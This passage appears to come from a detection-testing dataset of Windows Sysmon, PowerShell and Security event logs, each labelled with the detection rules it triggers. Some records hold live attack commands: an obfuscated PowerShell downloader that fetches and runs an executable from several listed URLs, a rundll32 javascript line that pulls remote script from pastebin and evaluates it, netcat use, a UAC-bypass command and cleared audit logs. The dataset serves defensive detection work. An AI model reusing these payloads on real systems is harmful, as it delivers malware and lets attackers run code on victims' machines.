(WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"net.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-077C-5E76-0000-0010A5BA2300","ParentProcessId":5068,"ProcessGuid":"747F3D96-0A2B-5E76-0000-0010C02A3D00","ProcessId":7072,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:55.872"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244336,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:35:55.876452Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Service Execution"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\net1 start CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Net Command","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=085E23DF67774ED89FD0215E1F144824F79F812B,MD5=63DD4523677E62A73A8A7494DB321EA2,SHA256=C687157FD58EAA51757CDA87D06C30953A31F03F5356B9F5A9C004FA4BAD4BF5,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E","Image":"C:\\Windows\\System32\\net1.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"net1.exe","ParentCommandLine":"net start CDPSvc","ParentImage":"C:\\Windows\\System32\\net.exe","ParentProcessGuid":"747F3D96-0A2B-5E76-0000-0010C02A3D00","ParentProcessId":7072,"ProcessGuid":"747F3D96-0A2B-5E76-0000-0010A92C3D00","ProcessId":7664,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:55.891"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244337,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:35:55.897450Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-069C-5E76-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-08DA-5E76-0000-001054382E00","ParentProcessId":2632,"ProcessGuid":"747F3D96-0A33-5E76-0000-0010B8813D00","ProcessId":3696,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-03-21 12:36:03.899"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244341,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:36:03.901088Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"nc.exe 127.0.0.1 
1337","Company":"?","CurrentDirectory":"c:\\Users\\Public\\Tools\\","Description":"?","FileVersion":"?","Hashes":"SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946","Image":"C:\\Users\\Public\\Tools\\nc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-06A4-5E76-0000-002087DE0200","LogonId":"0x2de87","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-06EF-5E76-0000-0010DC301A00","ParentProcessId":6236,"ProcessGuid":"747F3D96-0A36-5E76-0000-0010C8923D00","ProcessId":488,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:36:06.987"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244342,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:36:06.990686Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Fax Service DLL Search Order 
Hijack"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=9D1873AEFC3F59E649F3FB822C1FA3D52C39970E,MD5=9B97E05E67107AA18BBF3E4F5F121B2B,SHA256=9915C62360EFF866C09072AF754FA70A9BD4BF4A73CDB4048F415002F7256AD0,IMPHASH=DF1295012B8EB2127DC3667CF1881634","Image":"C:\\Windows\\System32\\FXSSVC.exe","ImageLoaded":"C:\\Windows\\System32\\Ualapi.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-E8A7-5F26-0000-0010230D1A00","ProcessId":5252,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-08-02 16:24:07.483"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":339882,"Execution_attributes":{"ProcessID":3200,"ThreadID":3596},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-08-02T16:24:07.551366Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-E308-5F26-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"c:\\windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-E8BA-5F26-0000-001035BE1A00","ParentProcessId":8104,"ProcessGuid":"747F3D96-E8BC-5F26-0000-0010F7C41A00","ProcessId":588,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-02 16:24:28.637"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":339891,"Execution_attributes":{"ProcessID":3200,"ThreadID":3032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-02T16:24:28.640990Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-90AF-610F-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":632,"ProcessGuid":"747F3D96-182D-610F-0000-00100344D300","ProcessId":11196,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-08-07 23:33:01.121"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":556726,"Execution_attributes":{"ProcessID":3232,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-08-07T23:33:01.176666Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c start /min C:\\Users\\Public\\KDECO.bat reg delete hkcu\\Environment /v windir /f && REM \\system32\\AppHostRegistrationVerifier.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1231-610F-0000-002057A80700","LogonId":"0x7a857","OriginalFileName":"Cmd.Exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":1108,"ProcessGuid":"747F3D96-183B-610F-0000-0010DC6CD400","ProcessId":11324,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2021-08-07 23:33:15.285"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":557006,"Execution_attributes":{"ProcessID":3232,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-08-07T23:33:15.303423Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"","ScriptBlockId":"fdd51159-9602-40cb-839d-c31039ebbc3a","ScriptBlockText":"$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\\WOrd\\2019\\ -itemtype DIrectOry;[Net.ServicePointManager]::\"SecURi`T`ypRO`T`oCOL\" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') 
neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/').\"S`Plit\"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.\"d`OWN`load`FIlE\"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_).\"le`NgTH\" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0')"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"DESKTOP-RIPCLIP","Correlation_attributes":{"ActivityID":"CCAD9034-7B61-0001-83CF-ADCC617BD601"},"EventID":4104,"EventRecordID":683,"Execution_attributes":{"ProcessID":6620,"ThreadID":6340},"Keywords":"0x0","Level":5,"Opcode":15,"Provider_attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"},"Security_attributes":{"UserID":"S-1-5-21-2895499743-3664716236-3399808827-1001"},"Task":2,"TimeCreated_attributes":{"SystemTime":"2020-08-26T05:09:28.845521Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":565591,"Execution_attributes":{"ProcessID":780,"ThreadID":2472},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-18T23:23:37.147709Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x4fd77","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":32853,"Execution_attributes":{"ProcessID":736,"ThreadID":1592},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-01-20T07:00:50.800225Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x35312","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":32950,"Execution_attributes":{"ProcessID":736,"ThreadID":2372},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-01-20T07:29:57.863893Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x35312","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Taskmgr as Parent"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\windows\\system32\\taskmgr.exe","ParentImage":"C:\\Windows\\System32\\Taskmgr.exe","ParentProcessGuid":"00247C92-858E-5F7B-0000-00105241202B","ParentProcessId":18404,"ProcessGuid":"00247C92-858E-5F7B-0000-0010E741202B","ProcessId":6636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 
20:43:58.450"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164892,"Execution_attributes":{"ProcessID":5424,"ThreadID":6708},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-05T20:43:58.451314Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["HH.exe Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\hh.exe\" C:\\Users\\IEUser\\Desktop\\Fax Record N104F.chm","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft® HTML Help Executable","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C","Image":"C:\\Windows\\hh.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-ABD5-5D3A-0000-0020EB990F00","LogonId":"0xf99eb","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-ABD7-5D3A-0000-001012661000","ParentProcessId":4940,"ProcessGuid":"747F3D96-AE22-5D3A-0000-001096B24E00","ProcessId":1504,"Product":"HTML Help","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-26 
07:39:14.345"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4348,"Execution_attributes":{"ProcessID":5924,"ThreadID":6056},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-26T07:39:14.375565Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32","HTML Help Shell Spawn","Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /c copy /Y C:\\Windows\\system32\\rundll32.exe %%TEMP%%\\out.exe > nul && %%TEMP%%\\out.exe javascript:\"\\..\\mshtml RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://pastebin.com/raw/y2CjnRtH\",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im out.exe\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-ABD5-5D3A-0000-0020EB990F00","LogonId":"0xf99eb","ParentCommandLine":"\"C:\\Windows\\hh.exe\" C:\\Users\\IEUser\\Desktop\\Fax Record 
N104F.chm","ParentImage":"C:\\Windows\\hh.exe","ParentProcessGuid":"747F3D96-AE22-5D3A-0000-001096B24E00","ParentProcessId":1504,"ProcessGuid":"747F3D96-AE22-5D3A-0000-001004D84E00","ProcessId":5548,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-26 07:39:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4353,"Execution_attributes":{"ProcessID":5924,"ThreadID":6056},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-26T07:39:14.935857Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" zipfldr.dll,RouteTheCall c:\\Windows\\System32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"python winpwnage.py -u execute -i 14 -p c:\\Windows\\System32\\calc.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-268F-5CD8-0000-0010F4A51700","ParentProcessId":1256,"ProcessGuid":"365ABB72-269E-5CD8-0000-001084F81A00","ProcessId":2728,"Product":"Microsoft® 
Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:58:54.772"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16443,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:58:54.897009Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Calculator","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\System32\\pcalua.exe\" -a c:\\Windows\\system32\\calc.exe","ParentImage":"C:\\Windows\\System32\\pcalua.exe","ParentProcessGuid":"365ABB72-517E-5CD8-0000-001024D61700","ParentProcessId":2952,"ProcessGuid":"365ABB72-517E-5CD8-0000-00105FE01700","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
